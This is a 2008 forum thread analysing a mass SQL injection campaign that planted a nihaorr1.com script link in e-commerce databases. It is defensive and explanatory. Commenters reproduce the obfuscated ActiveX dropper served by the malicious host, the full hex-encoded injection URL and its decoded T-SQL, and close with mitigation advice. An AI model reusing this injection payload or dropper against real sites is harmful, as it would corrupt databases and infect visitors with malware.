Anyone know about www.nihaorr1.com/1.js?

Posted: August 8, 2008 in Forums

The db that supports our companies ecommerce is filling up with this url. We seem to be victims of a sql injection attack. Is anyone else experiencing? How are you resolving? We just happened to see this data…are there other adverse affects to resources other than data?

Any shared experience would be helpful!

Advertisements
Comments
  1. Raja says:

    Yeah it is a script bot that spreads virus seems to be very wild atm.

    Googling nihaorr1.com there are many references to it on sites http://www.google.co.uk/search?hl=en&q=nihaorr1.com&btnG=Search&meta= (11,000 references at the time)

    Even when I clicked on a link and the virus checker popped up warning me of a virus there. I’ll not try again.

    It just seems to affect asp pages at the moment.

    There was a few recent vulenerabilities with asp and IIS over the last 6 months like

    http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx

    I expect it is explioting one of those.

    Take care.

  2. Raja says:

    Yikes, pretty dangerous, a good time to scan your content for this URL and notify the website owners so they can fix their websites, applications and then fix the form validation logic.

    Looks like someone is doing a lot of script code injection into a lot of vulnerable (read: poorly written) forms that aren’t validating input to strip out script code. These sites are then carrying javascript code that launches Remote Data Services Control ActiveX control … to exploit a few known vulnerabilities … use WFetch to debug this!!! (You can get WFetch for free in the IIS6.0 Resource Kit.)

    For example, here is how I looked at this:

    GET http://www.nihaorr1.com:80/1.js HTTP/1.1\r\n
    Host: http://www.nihaorr1.com\r\n
    Accept: */*\r\n
    \r\n

    HTTP/1.1 200 OK\r\n
    Connection: Keep-Alive\r\n
    Content-Length: 110\r\n
    Via: 1.1 RED-PRXY-29\r\n
    Date: Fri, 18 Apr 2008 23:53:38 GMT\r\n
    Content-Type: application/x-javascript\r\n
    ETag: “30e1873949a1c81:237″\r\n
    Server: Microsoft-IIS/6.0\r\n
    Last-Modified: Fri, 18 Apr 2008 11:42:04 GMT\r\n
    Accept-Ranges: bytes\r\n
    \r\n
    document.writeln(“”);\r\n
    \r\n

    Then I made a second request to the iframe it tries to create:

    GET http://www.nihaorr1.com:80/1.htm HTTP/1.1\r\n
    Host: http://www.nihaorr1.com\r\n
    Accept: */*\r\n
    \r\n

    HTTP/1.1 200 OK\r\n
    Connection: Keep-Alive\r\n
    Content-Length: 1160\r\n
    Date: Fri, 18 Apr 2008 23:53:51 GMT\r\n
    Content-Type: text/html\r\n
    ETag: “fc6b5a164da1c81:237″\r\n
    Server: Microsoft-IIS/6.0\r\n
    Last-Modified: Fri, 18 Apr 2008 12:09:43 GMT\r\n
    Accept-Ranges: bytes\r\n
    \r\n
    \r\n
    on error resume next\r\n
    Set downf = document.createElement(“object”)\r\n
    downf.setAttribute “classid”, “clsid:BD9″&”6C556-6″&”5A3-11D”&”0-983A-00C”&”04FC2″&”9E36″\r\n
    str=”Microsoft.XMLHTTP”\r\n
    Set O = downf.CreateObject(str,””)\r\n
    if Not Err.Number = 0 then\r\n
    err.clear\r\n
    document.write(“”) \r\n
    document.write(“”)\r\n
    document.write(“”) \r\n
    document.write(“”) \r\n
    document.write(“”) \r\n
    document.write(“”)\r\n
    else\r\n
    document.write(“”)\r\n
    document.write(“”)\r\n
    end if\r\n
    \r\n

  3. RK says:

    Long story short, it’s definitely SQL injection. here’s the offending url:

    orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000 4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055 00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900 73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069 006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000 62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031 0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00 200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043 0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00 27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C 005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00 6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045 00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000 43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075 00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);–
    decoding that binary data which is cast to a varchar yields this:

    DECLARE @T varchar(255)’@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name’b.name from sysobjects a’syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T’@C WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update [‘+@T+’] set [‘+@C+’]=rtrim(convert(varchar'[‘+@C+’]))+””’)FETCH NEXT FROM Table_Cursor INTO @T’@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    And there you have it. It finds all text columns in the database and adds itself to it.

  4. Raja says:

    “Best Practice” – lots of them – primarily checking each form processing script to ensure that one cannot simply pass in a long field and/or content which has sql commands such as “select”, “update”, etc.

    As you can see from this particular situation, the data may not be readily seen as offending (ie, the binary encoding). Testing length is therefore pretty important as a rule. If you are expecting to insert a product code into a shopping cart or an email address into a registration table, there is no reason to allow a string longer than the field length to be submitted to the database. One could argue that because of that, keep your field lengths to the minimum, etc.

    Minimize the number of dynamic sql statements

    Keep in mind that just limiting your form field’s “maxlength” property does little value as these attacks are not validated by any server side browser – they are launched via script or program and often at a very rapid pace.

    If your db connection for your site is using “sa” or equivalent, you also have a problem because they can launch extended stored procs. Make sure your db connection is using “user” level privileges only.

    these are some of the bigger items – there is lots on the net on the topic of ‘sql injection’

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s